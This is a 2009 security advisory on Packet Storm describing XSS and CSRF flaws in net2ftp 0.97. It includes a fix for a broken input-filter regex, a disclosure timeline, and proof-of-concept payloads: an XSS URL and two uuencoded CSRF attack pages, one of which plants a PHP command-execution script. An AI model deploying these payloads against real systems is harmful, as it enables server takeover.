exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

net2ftp 0.97 XSS / XSRF

net2ftp 0.97 XSS / XSRF
Posted Apr 8, 2009
Authored by C1c4Tr1Z

net2ftp versions 0.97 and below suffer from cross site scripting and cross site request forgery vulnerabilities.

tags | exploit, vulnerability, xss, csrf
SHA-256 | 433699ef9d591114e5c64f6df12a1c3da921c0505de64830a75dac18c05c1c86

net2ftp 0.97 XSS / XSRF

Change Mirror Download
#=cicatriz
<c1c4tr1z@voodoo-labs.org>=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~(advisories)=#
/) /) /)
_ _ _______(/ ________ // _ (/_ _ _____ _
(/__(_)(_)(_(_(_)(_) (/_(_(_/_) /_)_ o (_)/ (_(_/_
.-/
#=net2ftp <= 0.97 Cross-Site Scripting/Request
Forgery=#=~~~~~~~~~~~~~~~(_/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Advisory & Vulnerability
Information=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

Title: net2ftp <= 0.97 Cross-Site Scripting/Request Forgery
Advisory ID: VUDO-2009-0804
Advisory URL: http://research.voodoo-labs.org/advisories/3
Date founded: 2009-04-02
Vendors contacted: net2ftp
Class: Multiple Vulnerabilities
Remotely Exploitable: Yes
Localy Exploitable: No
Exploit/PoC Available: Yes
Policy: Full Disclosure Policy (RFPolicy) v2.0

#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Tested & Vulnerable
packages=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

[+] net2ftp 0.97
[+] net2ftp 0.95

Beta:
[*] net2ftp 0.98 beta

#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Solutions and
Workarounds=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

The vendor didn't released any fix/update.

#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Technical
Information=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

Multiple vulnerabilities were found on the package net2ftp [1], version
0.98 and below. Two types of
vulnerabilities were found: Cross-Site Scripting and Cross-Site Request
Forgery.

[*] Cross-Site Scripting (XSS):

This vulnerability it's produced by a "typo" in the function
validateGeneriInput(), where the
extraction of characters < and > fails because the regular expression
in charge of the extraction
it's invalid.

+++includes/registerglobals.inc.php @@ 1088:1102
1088 function validateGenericInput($input) {
1089
1090 // --------------
1091 // Remove the following characters <>
1092 // --------------
1093
1094 // Remove XSS code
1095 // $input = RemoveXSS($input);
1096
1097 // Remove < >
XXX 1098 $input = preg_replace("/\\<\\>]/", "", $input);
1099
1100 return $input;
1101
1102 } // end validateGenericInput
---includes/registerglobals.inc.php

This can be easily fixed adding a "[" character to the pattern:

+++
$input = preg_replace("/[\\<\\>]/", "", $input);
---

[*] Cross-Site Request Forgery (CSRF):

All the forms on the web application are vulnerable because they
doesn't check any type of token to
ensure that the user submited the form. So an attacker can trick the
user to visit a website with this
type of method and perform certain actions on the server, like create
files, delete/rename/upload/etc.

#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Proof of
Concept=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

[*] Cross-Site Scripting (XSS):

+++
http://ftp.victim.com/?state=login_small&errormessage=<iframe
onload="alert(/voodoo/.source);">
---

[*] Cross-Site Request Forgery (CSRF):

With this HTML page an attacker can create a evil PHP script on the
user's server. (uuencoded)

+++
begin 644 attack.html
M/&AT;6P^"CQB;V1Y/@H)/&9O<FT@:60](D5D:71&;W)M(B!A8W1I;VX](FAT
M='!S.B\O9G1P+G9I8W1I;2YC;VTO:6YD97@N<&AP(B!O;G-U8FUI=#TB(B!M
M971H;V0](G!O<W0B/@H)"3QI;G!U="!N86UE/2)F='!S97)V97(B('9A;'5E
M/2)V:6-T:6TN9G1P<V5R=F5R+F-O;2(@='EP93TB:&ED9&5N(CX*"0D\:6YP
M=70@;F%M93TB9G1P<V5R=F5R<&]R="(@=F%L=64](C(Q(B!T>7!E/2)H:61D
M96XB/@H)"3QI;G!U="!N86UE/2)U<V5R;F%M92(@=F%L=64](G9I8W1I;75S
M97)N86UE(B!T>7!E/2)H:61D96XB/@H)"3QI;G!U="!N86UE/2)L86YG=6%G
M92(@=F%L=64](F5N(B!T>7!E/2)H:61D96XB/@H)"3QI;G!U="!N86UE/2)S
M:VEN(B!V86QU93TB:6YD:6$B('1Y<&4](FAI9&1E;B(^"@D)/&EN<'5T(&YA
M;64](F9T<&UO9&4B('9A;'5E/2)B:6YA<GDB('1Y<&4](FAI9&1E;B(^"@D)
M/&EN<'5T(&YA;64](G!A<W-I=F5M;V1E(B!V86QU93TB>65S(B!T>7!E/2)H
M:61D96XB/@H)"3QI;G!U="!N86UE/2)S<VQC;VYN96-T(B!V86QU93TB;F\B
M('1Y<&4](FAI9&1E;B(^"@D)/&EN<'5T(&YA;64](G9I97=M;V1E(B!V86QU
M93TB;&ES="(@='EP93TB:&ED9&5N(CX*"0D\:6YP=70@;F%M93TB<V]R="(@
M=F%L=64](B(@='EP93TB:&ED9&5N(CX*"0D\:6YP=70@;F%M93TB<V]R=&]R
M9&5R(B!V86QU93TB(B!T>7!E/2)H:61D96XB/@H)"3QI;G!U="!N86UE/2)S
M=&%T92(@=F%L=64](F5D:70B('1Y<&4](FAI9&1E;B(^"@D)/&EN<'5T(&YA
M;64](G-T871E,B(@=F%L=64](B(@='EP93TB:&ED9&5N(CX*"0D\:6YP=70@
M;F%M93TB9&ER96-T;W)Y(B!V86QU93TB+R(@='EP93TB:&ED9&5N(CX*"0D\
M:6YP=70@;F%M93TB<V-R965N(B!V86QU93TB,R(@='EP93TB:&ED9&5N(CX*
M"@D)/&EN<'5T(&YA;64](G1E>'1A<F5A5'EP92(@=F%L=64](B(@='EP93TB
M:&ED9&5N(CX*"0D\<V5L96-T(&YA;64](G1E>'1A<F5A4V5L96-T(B!I9#TB
M=&5X=&%R96%396QE8W0B(&]N8VAA;F=E/2)D;V-U;65N="YF;W)M<ULG161I
M=$9O<FTG72YS8W)E96XN=F%L=64],CMD;V-U;65N="YF;W)M<ULG161I=$9O
M<FTG72YT97AT87)E851Y<&4N=F%L=64]9&]C=6UE;G0N9F]R;7-;)T5D:71&
M;W)M)UTN=&5X=&%R96%396QE8W0N;W!T:6]N<UMD;V-U;65N="YF;W)M<ULG
M161I=$9O<FTG72YT97AT87)E85-E;&5C="YS96QE8W1E9$EN9&5X72YV86QU
M93MD;V-U;65N="YF;W)M<ULG161I=$9O<FTG72YS=6)M:70H*3LB/@H)"3QO
M<'1I;VX@=F%L=64](G!L86EN(B!S96QE8W1E9#TB<V5L96-T960B/DYO<FUA
M;"!T97AT87)E83PO;W!T:6]N/@H)"3PO<V5L96-T/@H)"3QI;G!U="!C;&%S
M<STB:6YP=70B(&YA;64](F5N=')Y(B!T>7!E/2)T97AT(B!V86QU93TB979I
M;"YP:'`B/CQB<CX*"0D\=&5X=&%R96$@;F%M93TB=&5X="(@8VQA<W,](F5D
M:70B(')O=W,](C,S(B!S='EL93TB=VED=&@Z(#DY)3LB('=R87`](F]F9B(@
M;VYK97ED;W=N/2)486)497AT*"DB/CP_/6![)%]'151;)V-M9"==?6`_/CPO
M=&5X=&%R96$^"@D\+V9O<FT^"CQS8W)I<'0^"F1O8W5M96YT+F9O<FUS6S!=
G+G-U8FUI="@I.PH\+W-C<FEP=#X*"CPO8F]D>3X*/"]H=&UL/@H*
`
end
---

[*] CSRF + XSS:

This is a Cross-Site Request Forgery attack that creates a simple
Cross-Site Scripting attack in the
"Bookmark" section. It can be even worse because the bookmark string
can be written according to the
attacker needs and the XSS vector can be permanent if the user saves
that bookmark (and the string
it's also vulnerable to XSS). (uuencoded)

+++
begin 644 xss-csrf-attack.html
M/&AT;6P^"CQB;V1Y/@H)/&9O<FT@:60](E-T871U<V)A<D9O<FTB(&%C=&EO
M;CTB:'1T<',Z+R]F='`N=FEC=&EM+F-O;2]I;F1E>"YP:'`B(&]N<W5B;6ET
M/2(B(&UE=&AO9#TB<&]S="(^"@D)/&EN<'5T(&YA;64](F9T<'-E<G9E<B(@
M=F%L=64](G9I8W1I;2YF='!S97)V97(N8V]M(B!T>7!E/2)H:61D96XB/@H)
M"3QI;G!U="!N86UE/2)F='!S97)V97)P;W)T(B!V86QU93TB,C$B('1Y<&4]
M(FAI9&1E;B(^"@D)/&EN<'5T(&YA;64](G5S97)N86UE(B!V86QU93TB=FEC
M=&EM=7-E<FYA;64B('1Y<&4](FAI9&1E;B(^"@D)/&EN<'5T(&YA;64](FQA
M;F=U86=E(B!V86QU93TB96XB('1Y<&4](FAI9&1E;B(^"@D)/&EN<'5T(&YA
M;64](G-K:6XB('9A;'5E/2)I;F1I82(@='EP93TB:&ED9&5N(CX*"0D\:6YP
M=70@;F%M93TB9G1P;6]D92(@=F%L=64](F)I;F%R>2(@='EP93TB:&ED9&5N
M(CX*"0D\:6YP=70@;F%M93TB<&%S<VEV96UO9&4B('9A;'5E/2)Y97,B('1Y
M<&4](FAI9&1E;B(^"@D)/&EN<'5T(&YA;64](G-S;&-O;FYE8W0B('9A;'5E
M/2)N;R(@='EP93TB:&ED9&5N(CX*"0D\:6YP=70@;F%M93TB=FEE=VUO9&4B
M('9A;'5E/2)L:7-T(B!T>7!E/2)H:61D96XB/@H)"3QI;G!U="!N86UE/2)S
M;W)T(B!V86QU93TB(B!T>7!E/2)H:61D96XB/@H)"3QI;G!U="!N86UE/2)S
M;W)T;W)D97(B('9A;'5E/2(B('1Y<&4](FAI9&1E;B(^"@D)/&EN<'5T(&YA
M;64](G-T871E(B!V86QU93TB8F]O:VUA<FLB('1Y<&4](FAI9&1E;B(^"@D)
M/&EN<'5T(&YA;64](G-T871E,B(@=F%L=64](FUA:6XB('1Y<&4](FAI9&1E
M;B(^"@D)/&EN<'5T(&YA;64](F1I<F5C=&]R>2(@=F%L=64](B\B('1Y<&4]
M(FAI9&1E;B(^"@H)"3QI;G!U="!N86UE/2)U<FPB('9A;'5E/2)J879A<V-R
M:7!T.F%L97)T*#`I.R(@='EP93TB:&ED9&5N(CX*"0D\:6YP=70@;F%M93TB
M=&5X="(@=F%L=64](B9L=#MI9G)A;64@<W)C/6AT='`Z+R]V;V]D;V\M;&%B
M<RYO<F<@;VYL;V%D/6%L97)T*'5N97-C87!E*"]V;V]D;V\E,C!P96]P;&4A
M+RYS;W5R8V4I*3LF9W0[)FQT.R]I9G)A;64F9W0[(B!T>7!E/2)H:61D96XB
M/@H)/"]F;W)M/@H*/'-C<FEP=#X*9&]C=6UE;G0N9F]R;7-;,%TN<W5B;6ET
?*"D["CPO<V-R:7!T/@H*/"]B;V1Y/@H\+VAT;6P^"@``
`
end
---

#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=Reporting
Timeline=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

[*] 02-04-2009: Bugs discovered.
[*] 03-04-2009: Voodoo contacted the vendor.
[*] 08-04-2009: After 5 days the vendor didn't gave any response.
[*] 08-04-2009: Advisory VUDO-2009-0804 published.

#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#
#=References=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#

[1] http://www.net2ftp.com/

#=cicatriz
<c1c4tr1z@voodoo-labs.org>=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~(advisories)=#
#= miƩ 08 abr 2009 ART
=#=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=#


Thanks packetstorm staff.
--
C1c4Tr1Z <research@voodoo-labs.org>
Voodoo Research Group
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close